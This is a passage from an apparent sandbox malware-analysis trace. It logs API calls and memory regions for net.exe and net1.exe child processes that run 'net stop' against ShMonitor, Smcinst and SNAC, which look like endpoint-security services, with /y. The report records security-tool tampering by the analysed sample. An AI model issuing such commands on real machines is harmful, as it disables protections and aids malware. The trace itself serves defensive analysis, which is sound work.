_String2="ShMonitor") returned -12 [0110.404] _wcsicmp (_String1="help", _String2="ShMonitor") returned -11 [0110.404] _wcsicmp (_String1="helpmsg", _String2="ShMonitor") returned -11 [0110.404] _wcsicmp (_String1="localgroup", _String2="ShMonitor") returned -7 [0110.404] _wcsicmp (_String1="pause", _String2="ShMonitor") returned -3 [0110.404] _wcsicmp (_String1="session", _String2="ShMonitor") returned -3 [0110.404] _wcsicmp (_String1="sessions", _String2="ShMonitor") returned -3 [0110.404] _wcsicmp (_String1="sess", _String2="ShMonitor") returned -3 [0110.404] _wcsicmp (_String1="share", _String2="ShMonitor") returned -12 [0110.404] _wcsicmp (_String1="start", _String2="ShMonitor") returned 12 [0110.404] _wcsicmp (_String1="stats", _String2="ShMonitor") returned 12 [0110.404] _wcsicmp (_String1="statistics", _String2="ShMonitor") returned 12 [0110.404] _wcsicmp (_String1="stop", _String2="ShMonitor") returned 12 [0110.404] _wcsicmp (_String1="time", _String2="ShMonitor") returned 1 [0110.404] _wcsicmp (_String1="user", _String2="ShMonitor") returned 2 [0110.404] _wcsicmp (_String1="users", _String2="ShMonitor") returned 2 [0110.404] _wcsicmp (_String1="msg", _String2="ShMonitor") returned -6 [0110.404] _wcsicmp (_String1="messenger", _String2="ShMonitor") returned -6 [0110.404] _wcsicmp (_String1="receiver", _String2="ShMonitor") returned -1 [0110.404] _wcsicmp (_String1="rcv", _String2="ShMonitor") returned -1 [0110.404] _wcsicmp (_String1="netpopup", _String2="ShMonitor") returned -5 [0110.404] _wcsicmp (_String1="redirector", _String2="ShMonitor") returned -1 [0110.404] _wcsicmp (_String1="redir", _String2="ShMonitor") returned -1 [0110.404] _wcsicmp (_String1="rdr", _String2="ShMonitor") returned -1 [0110.404] _wcsicmp (_String1="workstation", _String2="ShMonitor") returned 4 [0110.404] _wcsicmp (_String1="work", _String2="ShMonitor") returned 4 [0110.404] _wcsicmp (_String1="wksta", _String2="ShMonitor") returned 4 [0110.404] _wcsicmp (_String1="prdr", _String2="ShMonitor") returned -3 [0110.405] _wcsicmp (_String1="devrdr", _String2="ShMonitor") returned -15 [0110.405] _wcsicmp (_String1="lanmanworkstation", _String2="ShMonitor") returned -7 [0110.405] _wcsicmp (_String1="server", _String2="ShMonitor") returned -3 [0110.405] _wcsicmp (_String1="svr", _String2="ShMonitor") returned 14 [0110.405] _wcsicmp (_String1="srv", _String2="ShMonitor") returned 10 [0110.405] _wcsicmp (_String1="lanmanserver", _String2="ShMonitor") returned -7 [0110.405] _wcsicmp (_String1="alerter", _String2="ShMonitor") returned -18 [0110.405] _wcsicmp (_String1="netlogon", _String2="ShMonitor") returned -5 [0110.405] _wcsupr (in: _String="ShMonitor" | out: _String="SHMONITOR") returned="SHMONITOR" [0110.405] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x25ce00 [0110.409] GetServiceKeyNameW (in: hSCManager=0x25ce00, lpDisplayName="SHMONITOR", lpServiceName=0xff935750, lpcchBuffer=0x1af748 | out: lpServiceName="", lpcchBuffer=0x1af748) returned 0 [0110.410] _wcsicmp (_String1="msg", _String2="SHMONITOR") returned -6 [0110.410] _wcsicmp (_String1="messenger", _String2="SHMONITOR") returned -6 [0110.410] _wcsicmp (_String1="receiver", _String2="SHMONITOR") returned -1 [0110.410] _wcsicmp (_String1="rcv", _String2="SHMONITOR") returned -1 [0110.410] _wcsicmp (_String1="redirector", _String2="SHMONITOR") returned -1 [0110.410] _wcsicmp (_String1="redir", _String2="SHMONITOR") returned -1 [0110.411] _wcsicmp (_String1="rdr", _String2="SHMONITOR") returned -1 [0110.411] _wcsicmp (_String1="workstation", _String2="SHMONITOR") returned 4 [0110.411] _wcsicmp (_String1="work", _String2="SHMONITOR") returned 4 [0110.411] _wcsicmp (_String1="wksta", _String2="SHMONITOR") returned 4 [0110.411] _wcsicmp (_String1="prdr", _String2="SHMONITOR") returned -3 [0110.411] _wcsicmp (_String1="devrdr", _String2="SHMONITOR") returned -15 [0110.411] _wcsicmp (_String1="lanmanworkstation", _String2="SHMONITOR") returned -7 [0110.411] _wcsicmp (_String1="server", _String2="SHMONITOR") returned -3 [0110.411] _wcsicmp (_String1="svr", _String2="SHMONITOR") returned 14 [0110.411] _wcsicmp (_String1="srv", _String2="SHMONITOR") returned 10 [0110.411] _wcsicmp (_String1="lanmanserver", _String2="SHMONITOR") returned -7 [0110.411] _wcsicmp (_String1="alerter", _String2="SHMONITOR") returned -18 [0110.411] _wcsicmp (_String1="netlogon", _String2="SHMONITOR") returned -5 [0110.411] NetServiceControl (in: servername=0x0, service="SHMONITOR", opcode=0x0, arg=0x0, bufptr=0x1af750 | out: bufptr=0x1af750) returned 0x889 [0110.412] wcscpy_s (in: _Destination=0xff9380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0110.412] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0110.413] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff935b50, nSize=0x800, Arguments=0xff937f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0110.414] GetFileType (hFile=0xb) returned 0x2 [0110.414] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af618 | out: lpMode=0x1af618) returned 1 [0110.415] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff935b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af610, lpReserved=0x0 | out: lpBuffer=0xff935b50*, lpNumberOfCharsWritten=0x1af610*=0x1e) returned 1 [0110.415] GetFileType (hFile=0xb) returned 0x2 [0110.415] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af618 | out: lpMode=0x1af618) returned 1 [0110.415] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff911efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af610, lpReserved=0x0 | out: lpBuffer=0xff911efc*, lpNumberOfCharsWritten=0x1af610*=0x2) returned 1 [0110.416] _ultow (in: _Dest=0x889, _Radix=1767040 | out: _Dest=0x889) returned="2185" [0110.416] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff935b50, nSize=0x800, Arguments=0xff937f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0110.416] GetFileType (hFile=0xb) returned 0x2 [0110.416] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af618 | out: lpMode=0x1af618) returned 1 [0110.416] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff935b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af610, lpReserved=0x0 | out: lpBuffer=0xff935b50*, lpNumberOfCharsWritten=0x1af610*=0x34) returned 1 [0110.417] GetFileType (hFile=0xb) returned 0x2 [0110.417] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af618 | out: lpMode=0x1af618) returned 1 [0110.417] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff911efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af610, lpReserved=0x0 | out: lpBuffer=0xff911efc*, lpNumberOfCharsWritten=0x1af610*=0x2) returned 1 [0110.418] NetApiBufferFree (Buffer=0x254d50) returned 0x0 [0110.418] NetApiBufferFree (Buffer=0x25c0f0) returned 0x0 [0110.418] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ShMonitor /y" [0110.418] exit (_Code=2) Process: id = "265" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x53019000" os_pid = "0xfe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "258" os_parent_pid = "0xfa0" cmd_line = "C:\\Windows\\system32\\net1 stop Smcinst /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9895 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9896 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9897 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9898 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 9899 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9900 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9901 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9902 start_va = 0xff910000 end_va = 0xff942fff entry_point = 0xff910000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9903 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9904 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9905 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9906 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9907 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 9908 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9909 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9910 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9911 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9912 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9913 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 9914 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9915 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9916 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9917 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9918 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9919 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9920 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9921 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9922 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9923 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9924 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9925 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9926 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9927 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9928 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9929 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9930 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9931 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9932 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9973 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 747 os_tid = 0xf58 [0110.327] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef970 | out: lpSystemTimeAsFileTime=0xef970*(dwLowDateTime=0xf6e9bd30, dwHighDateTime=0x1d48689)) [0110.327] GetCurrentProcessId () returned 0xfe8 [0110.327] GetCurrentThreadId () returned 0xf58 [0110.327] GetTickCount () returned 0x254c3 [0110.327] QueryPerformanceCounter (in: lpPerformanceCount=0xef978 | out: lpPerformanceCount=0xef978*=1815724500000) returned 1 [0110.329] GetModuleHandleW (lpModuleName=0x0) returned 0xff910000 [0110.329] __set_app_type (_Type=0x1) [0110.329] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff929c9c) returned 0x0 [0110.329] __getmainargs (in: _Argc=0xff934780, _Argv=0xff934790, _Env=0xff934788, _DoWildCard=0, _StartInfo=0xff93479c | out: _Argc=0xff934780, _Argv=0xff934790, _Env=0xff934788) returned 0 [0110.329] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0110.329] GetConsoleOutputCP () returned 0x1b5 [0110.420] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff93cec0 | out: lpCPInfo=0xff93cec0) returned 1 [0110.420] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0110.422] sprintf_s (in: _DstBuf=0xef918, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0110.422] setlocale (category=0, locale=".437") returned="English_United States.437" [0110.424] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0110.424] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0110.424] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Smcinst /y" [0110.424] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef6b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0110.424] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0110.424] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xef908 | out: Buffer=0xef908*=0x2e4d40) returned 0x0 [0110.424] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xef908 | out: Buffer=0xef908*=0x2ec0e0) returned 0x0 [0110.424] _fileno (_File=0x7fefdba2a80) returned 0 [0110.424] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0110.425] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0110.425] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0110.425] _wcsicmp (_String1="config", _String2="stop") returned -16 [0110.425] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0110.425] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0110.425] _wcsicmp (_String1="file", _String2="stop") returned -13 [0110.425] _wcsicmp (_String1="files", _String2="stop") returned -13 [0110.425] _wcsicmp (_String1="group", _String2="stop") returned -12 [0110.425] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0110.425] _wcsicmp (_String1="help", _String2="stop") returned -11 [0110.425] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0110.425] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0110.425] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0110.425] _wcsicmp (_String1="session", _String2="stop") returned -15 [0110.425] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0110.425] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0110.425] _wcsicmp (_String1="share", _String2="stop") returned -12 [0110.425] _wcsicmp (_String1="start", _String2="stop") returned -14 [0110.425] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0110.425] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0110.425] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0110.425] _wcsicmp (_String1="accounts", _String2="Smcinst") returned -18 [0110.425] _wcsicmp (_String1="computer", _String2="Smcinst") returned -16 [0110.425] _wcsicmp (_String1="config", _String2="Smcinst") returned -16 [0110.425] _wcsicmp (_String1="continue", _String2="Smcinst") returned -16 [0110.425] _wcsicmp (_String1="cont", _String2="Smcinst") returned -16 [0110.426] _wcsicmp (_String1="file", _String2="Smcinst") returned -13 [0110.426] _wcsicmp (_String1="files", _String2="Smcinst") returned -13 [0110.426] _wcsicmp (_String1="group", _String2="Smcinst") returned -12 [0110.426] _wcsicmp (_String1="groups", _String2="Smcinst") returned -12 [0110.426] _wcsicmp (_String1="help", _String2="Smcinst") returned -11 [0110.426] _wcsicmp (_String1="helpmsg", _String2="Smcinst") returned -11 [0110.426] _wcsicmp (_String1="localgroup", _String2="Smcinst") returned -7 [0110.426] _wcsicmp (_String1="pause", _String2="Smcinst") returned -3 [0110.426] _wcsicmp (_String1="session", _String2="Smcinst") returned -8 [0110.426] _wcsicmp (_String1="sessions", _String2="Smcinst") returned -8 [0110.426] _wcsicmp (_String1="sess", _String2="Smcinst") returned -8 [0110.426] _wcsicmp (_String1="share", _String2="Smcinst") returned -5 [0110.426] _wcsicmp (_String1="start", _String2="Smcinst") returned 7 [0110.426] _wcsicmp (_String1="stats", _String2="Smcinst") returned 7 [0110.426] _wcsicmp (_String1="statistics", _String2="Smcinst") returned 7 [0110.426] _wcsicmp (_String1="stop", _String2="Smcinst") returned 7 [0110.426] _wcsicmp (_String1="time", _String2="Smcinst") returned 1 [0110.426] _wcsicmp (_String1="user", _String2="Smcinst") returned 2 [0110.426] _wcsicmp (_String1="users", _String2="Smcinst") returned 2 [0110.426] _wcsicmp (_String1="msg", _String2="Smcinst") returned -6 [0110.426] _wcsicmp (_String1="messenger", _String2="Smcinst") returned -6 [0110.426] _wcsicmp (_String1="receiver", _String2="Smcinst") returned -1 [0110.426] _wcsicmp (_String1="rcv", _String2="Smcinst") returned -1 [0110.426] _wcsicmp (_String1="netpopup", _String2="Smcinst") returned -5 [0110.426] _wcsicmp (_String1="redirector", _String2="Smcinst") returned -1 [0110.426] _wcsicmp (_String1="redir", _String2="Smcinst") returned -1 [0110.426] _wcsicmp (_String1="rdr", _String2="Smcinst") returned -1 [0110.426] _wcsicmp (_String1="workstation", _String2="Smcinst") returned 4 [0110.426] _wcsicmp (_String1="work", _String2="Smcinst") returned 4 [0110.426] _wcsicmp (_String1="wksta", _String2="Smcinst") returned 4 [0110.426] _wcsicmp (_String1="prdr", _String2="Smcinst") returned -3 [0110.426] _wcsicmp (_String1="devrdr", _String2="Smcinst") returned -15 [0110.426] _wcsicmp (_String1="lanmanworkstation", _String2="Smcinst") returned -7 [0110.426] _wcsicmp (_String1="server", _String2="Smcinst") returned -8 [0110.427] _wcsicmp (_String1="svr", _String2="Smcinst") returned 9 [0110.427] _wcsicmp (_String1="srv", _String2="Smcinst") returned 5 [0110.427] _wcsicmp (_String1="lanmanserver", _String2="Smcinst") returned -7 [0110.427] _wcsicmp (_String1="alerter", _String2="Smcinst") returned -18 [0110.427] _wcsicmp (_String1="netlogon", _String2="Smcinst") returned -5 [0110.427] _wcsupr (in: _String="Smcinst" | out: _String="SMCINST") returned="SMCINST" [0110.427] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2ecdf0 [0110.431] GetServiceKeyNameW (in: hSCManager=0x2ecdf0, lpDisplayName="SMCINST", lpServiceName=0xff935750, lpcchBuffer=0xef828 | out: lpServiceName="", lpcchBuffer=0xef828) returned 0 [0110.432] _wcsicmp (_String1="msg", _String2="SMCINST") returned -6 [0110.432] _wcsicmp (_String1="messenger", _String2="SMCINST") returned -6 [0110.432] _wcsicmp (_String1="receiver", _String2="SMCINST") returned -1 [0110.432] _wcsicmp (_String1="rcv", _String2="SMCINST") returned -1 [0110.432] _wcsicmp (_String1="redirector", _String2="SMCINST") returned -1 [0110.432] _wcsicmp (_String1="redir", _String2="SMCINST") returned -1 [0110.432] _wcsicmp (_String1="rdr", _String2="SMCINST") returned -1 [0110.432] _wcsicmp (_String1="workstation", _String2="SMCINST") returned 4 [0110.432] _wcsicmp (_String1="work", _String2="SMCINST") returned 4 [0110.432] _wcsicmp (_String1="wksta", _String2="SMCINST") returned 4 [0110.432] _wcsicmp (_String1="prdr", _String2="SMCINST") returned -3 [0110.432] _wcsicmp (_String1="devrdr", _String2="SMCINST") returned -15 [0110.433] _wcsicmp (_String1="lanmanworkstation", _String2="SMCINST") returned -7 [0110.433] _wcsicmp (_String1="server", _String2="SMCINST") returned -8 [0110.433] _wcsicmp (_String1="svr", _String2="SMCINST") returned 9 [0110.433] _wcsicmp (_String1="srv", _String2="SMCINST") returned 5 [0110.433] _wcsicmp (_String1="lanmanserver", _String2="SMCINST") returned -7 [0110.433] _wcsicmp (_String1="alerter", _String2="SMCINST") returned -18 [0110.433] _wcsicmp (_String1="netlogon", _String2="SMCINST") returned -5 [0110.433] NetServiceControl (in: servername=0x0, service="SMCINST", opcode=0x0, arg=0x0, bufptr=0xef830 | out: bufptr=0xef830) returned 0x889 [0110.434] wcscpy_s (in: _Destination=0xff9380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0110.434] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0110.437] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff935b50, nSize=0x800, Arguments=0xff937f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0110.439] GetFileType (hFile=0xb) returned 0x2 [0110.439] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef6f8 | out: lpMode=0xef6f8) returned 1 [0110.439] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff935b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xef6f0, lpReserved=0x0 | out: lpBuffer=0xff935b50*, lpNumberOfCharsWritten=0xef6f0*=0x1e) returned 1 [0110.439] GetFileType (hFile=0xb) returned 0x2 [0110.440] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef6f8 | out: lpMode=0xef6f8) returned 1 [0110.440] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff911efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef6f0, lpReserved=0x0 | out: lpBuffer=0xff911efc*, lpNumberOfCharsWritten=0xef6f0*=0x2) returned 1 [0110.440] _ultow (in: _Dest=0x889, _Radix=980832 | out: _Dest=0x889) returned="2185" [0110.440] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff935b50, nSize=0x800, Arguments=0xff937f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0110.440] GetFileType (hFile=0xb) returned 0x2 [0110.441] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef6f8 | out: lpMode=0xef6f8) returned 1 [0110.441] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff935b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xef6f0, lpReserved=0x0 | out: lpBuffer=0xff935b50*, lpNumberOfCharsWritten=0xef6f0*=0x34) returned 1 [0110.441] GetFileType (hFile=0xb) returned 0x2 [0110.441] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef6f8 | out: lpMode=0xef6f8) returned 1 [0110.442] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff911efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef6f0, lpReserved=0x0 | out: lpBuffer=0xff911efc*, lpNumberOfCharsWritten=0xef6f0*=0x2) returned 1 [0110.442] NetApiBufferFree (Buffer=0x2e4d40) returned 0x0 [0110.442] NetApiBufferFree (Buffer=0x2ec0e0) returned 0x0 [0110.442] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Smcinst /y" [0110.442] exit (_Code=2) Process: id = "266" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x53b3d000" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SNAC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9933 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9934 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9935 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9936 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9937 